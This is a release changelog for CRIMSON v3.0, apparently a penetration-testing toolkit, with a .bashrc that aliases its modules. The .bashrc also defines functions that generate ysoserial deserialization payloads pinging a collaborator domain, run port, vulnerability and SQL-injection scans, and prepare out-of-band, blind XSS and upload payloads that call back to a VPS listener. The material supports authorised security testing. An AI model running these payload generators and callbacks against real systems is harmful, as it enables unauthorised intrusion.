CRIMSON v3.0

@Karmaz95 released this 19 Aug 20:43

CHANGELOG

MAJOR CHANGES

  • Changed the operating system from Ubuntu to Kali.
  • Changed the .bashrc aliases (the new .bashrc is listed below).
  • All modules were rebuilt.
  • Added a new module, crimson_IPcon, for IP-only assessments.
  • Active Directory enumeration and vulnerability scanning were added to crimson_IPcon.
  • No more port scanning in crimson_recon and crimson_target. If you need this functionality, use crimson_IPcon.
  • No more Python 2.7 code (there are still some scripts in the /scripts/ directory, but the modules do not use them; I decided to leave them there so I can rewrite the code in Python 3 or Go in the future if needed).
  • testssl, wpscan and jwt_tool were moved from crimson_exploit to crimson_target.
  • crimson_exploit no longer needs a domain name. Just place the params.txt, all.txt and dirs.txt files in the current directory and run the script.
  • Added sstimap.py to the SSTI testing in the crimson_exploit module.

MINOR CHANGES

  • crimson_faker.py script: a template for generating fake data for API testing.
  • crimson_target: the dig_for_secret functions were moved out. They will be part of the 5th module, for static code analysis, in the next patch.
  • New flag crimson_target -n to skip directory brute-forcing.
  • All banners were removed from the modules.
  • Nuclei runs in headless mode.
  • You can use the c_0, c_1, c_2 and c_3 aliases instead of crimson_MODULE-NAME (see the .bashrc below).
  • Removed some static code analysis functions from the modules and placed them in the future c_4 module, named crimson_lang.

NEW .BASHRC

### PATHS
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export CRIMSON_PATH=/root/tools/crimson   # the functions below use $HOME/tools/crimson, the same path when running as root on Kali

### CRIMSON
alias crimson="cd $CRIMSON_PATH"
alias c_0="$CRIMSON_PATH/crimson_IPcon"
alias c_1="$CRIMSON_PATH/crimson_recon"
alias c_2="$CRIMSON_PATH/crimson_target"
alias c_3="$CRIMSON_PATH/crimson_exploit"

### TOOLS
alias bat="batcat"
alias fd="fdfind"
alias cme="crackmapexec"
alias quickpress="/root/tools/quickpress/quickpress"
alias sss="python3 -m http.server 80"
alias psbase64_encode="iconv -t utf-16le | base64 -w 0"
alias parse_nmap="ultimate-nmap-parser.sh *.gnmap --all"
alias grep_domain="awk -F/ '{print \$3}' | sort -u"   # \$3 must survive the double quotes, otherwise awk gets '{print }' and echoes whole lines
alias ferox="feroxbuster -C 400,404 --auto-tune  -nEgBekr --wordlist $HOME/tools/crimson/words/dir -o ferox.txt -I 3gp,aac,apng,avif,bmp,class,com,css,cur,doc,flac,gif,gz,ico,jar,jfif,jpeg,jpg,m4a,m4p,m4v,mov,mp3,mp4,mpeg,mpg,oga,ogg,ogv,pdf,pif,pjp,pjpeg,png,ram,scr,snp,svg,swf,tgz,tif,tiff,wav,webm,webp,woff,xls -u"


### FUNCTIONS
function gen_net_ysoserial() {
    # GENERATE .NET YSOSERIAL PAYLOADS USING GADGETS FROM $HOME/tools/crimson/words/exp/netgadgets
    # ARG[1] is the collaborator domain (each payload pings it, so a hit proves deserialization)
    # EXAMPLE: gen_net_ysoserial DOMAIN.BURP.COM
    # Output: one base64 BinaryFormatter payload per gadget in net_deserialization_payloads.txt
    for gadget in $(cat "$HOME/tools/crimson/words/exp/netgadgets")
    do
        wine "$HOME/tools/crimson/scripts/GOAST/net-ysoserial-135/ysoserial.exe" -f BinaryFormatter -g "$gadget" -o base64 -c "ping $1" /nogui >> net_deserialization_payloads.txt
    done
}
function gen_java_ysoserial() {
    # GENERATE JAVA YSOSERIAL PAYLOADS USING GADGETS FROM $HOME/tools/crimson/words/exp/jargadgets
    # ARG[1] is the collaborator domain
    # EXAMPLE: gen_java_ysoserial DOMAIN.BURP.COM
    # Output: one base64 payload per line in java_deserialization_payloads.txt;
    # gadgets that fail to generate produce no line (no temp file or blank-line cleanup needed)
    for gadget in $(cat "$HOME/tools/crimson/words/exp/jargadgets")
    do
        payload=$(java -jar "$HOME/tools/ysoserial/ysoserial.jar" "$gadget" "$1" | base64 -w0)
        [ -n "$payload" ] && echo "$payload" >> java_deserialization_payloads.txt
    done
}

function rr {
        # FAST FULL PORT SCAN: rustscan finds open ports, then hands them to nmap
        # ARG[1] is the target IP/host; results land in scan.nmap, scan.gnmap and scan.xml
        ulimit -n 5000   # rustscan opens many sockets at once
        rustscan -a "$1" -- -n -A -Pn --script discovery,vuln --append-output -oA scan
}

function sqli {
        # QUICK SQLMAP CHECK: grab the DBMS banner with all optimisations on, quiet output
        # ARG[1] is the full URL including the injectable parameter
        sqlmap -o -v 0 --banner -u "$1"
}

function words {
    # PREPARE OOB PAYLOADS, WORDLISTS AND UPLOAD FILES FOR THE CURRENT TARGET
    # ARG[1] is the collaborator domain, ARG[2] the VPS IP, ARG[3] the VPS listener port
    # EXAMPLE: words DOMAIN.BURP.COM 10.0.0.5 4444
    local W="$HOME/tools/crimson/words"
    # Java deserialization payload URLDNS (* swap the java path if it does not work)
    java -jar "$HOME/tools/crimson/scripts/GOAST/ysoserial.jar" URLDNS "http://$1" | base64 -w0 > oob.fuzz
    echo >> oob.fuzz
    # OOB payload list: fill in the collaborator domain and the VPS IP, then swap the
    # template port 80 for the real listener port (order matters: vps_ip is replaced first)
    sed -e "s/domain_collab/$1/g" -e "s/vps_ip/$2/g" -e "s/$2:80/$2:$3/g" "$W/exp/OOB" >> oob.fuzz
    sed "s/domain_collab/$1/g" "$W/exp/BLIND_XSS" >> oob.fuzz
    # Copy the OOB list to the Windows clipboard (WSL only; use xclip/xsel on a native Kali box)
    clip.exe < oob.fuzz
    # Other wordlists and files to upload
    cat "$W/bug" >> bug.fuzz
    sed "s/domain_collab/$1/g" "$W/exp/http_leaks" >> http_leaks
    cat "$W/exp/bypass_ext" >> bypass_ext
    sed "s/domain_collab/$1/g" "$W/exp/BLIND_XSS" >> BLIND_XSS
    sed "s/domain_collab/$1/g" "$W/exp/headers" >> headers.fuzz
    # Upload directory: copy the templates and bake the callback addresses into them
    mkdir -p upload && cd upload || return 1
    cp "$HOME/tools/crimson/upload/"* .
    sed "s/domain_collab/$1/g" exiftool.jpg > exiftooldomain.jpg
    sed "s/domain_collab/$2:$3/g" exiftool.jpg > exiftoolvps.jpg
    # Rewrite in place so the file holds only the filled-in payloads, not the raw template lines too
    sed -i -e "s/domain_collab/$1/g" -e "s/vps_ip/$2/g" -e "s/$2:80/$2:$3/g" formula_injections.txt
    cd ..
}
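The words function above builds the OOB list by plain sed substitution, replacing vps_ip with the VPS IP and then IP:80 with IP:PORT. That second pass also matches the prefix of any template that already carries a different port (IP:8080 becomes IP:444480, for example). The function below is an added example, not part of CRIMSON: it performs the same rendering in one pass, substituting the explicit vps_ip:80 marker before the bare vps_ip placeholder so longer ports are left alone, and escapes the replacement values so a domain or port containing sed-special characters cannot break the expression. The placeholder names mirror the ones words uses; the template lines are constructed for this example and are not the project's OOB list; \b is a GNU sed word boundary, so this assumes GNU sed as shipped on Kali.

```shell
#!/usr/bin/env bash
# Render out-of-band (OOB) payload templates for a collaborator domain and a
# VPS ip:port. Added example, not CRIMSON code; placeholder names mirror the
# ones the words() function substitutes.

# Escape a value for the replacement side of a sed "s|||" expression:
# backslash, ampersand (whole match) and the '|' delimiter are special there.
sed_escape_repl() {
    printf '%s' "$1" | sed -e 's/[\\&|]/\\&/g'
}

# usage: render_oob_templates DOMAIN IP PORT < templates
# Substitution order matters: "vps_ip:80" (followed by a word boundary) is
# rewritten to IP:PORT before the bare "vps_ip" placeholder, so a template
# line containing vps_ip:8080 keeps its own port instead of being mangled.
render_oob_templates() {
    local domain ip port
    domain=$(sed_escape_repl "$1")
    ip=$(sed_escape_repl "$2")
    port=$(sed_escape_repl "$3")
    sed -e "s|vps_ip:80\b|${ip}:${port}|g" \
        -e "s|vps_ip|${ip}|g" \
        -e "s|domain_collab|${domain}|g"
}

# Constructed template lines (not the project's OOB list) covering the cases
# above: a domain-only callback, the default port 80, a longer port, no port.
sample_templates() {
    cat <<'EOF'
http://domain_collab/
http://vps_ip:80/x
http://vps_ip:8080/y
ldap://vps_ip/a
EOF
}

# Render the constructed templates for DOMAIN IP PORT and return the result.
render_sample() {
    sample_templates | render_oob_templates "$1" "$2" "$3"
}

# Example run:
#   render_sample abc.oastify.com 10.0.0.5 4444
```

To use it against the real list, pipe the template file in (`render_oob_templates "$1" "$2" "$3" < "$HOME/tools/crimson/words/exp/OOB" >> oob.fuzz`); the only behavioural difference from the two-pass version is that templates with a port other than 80 are left intact.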

WHAT IS NEXT?

  • The crimson_lang module is on the way.
  • The new module will cover white-box testing for many different programming languages.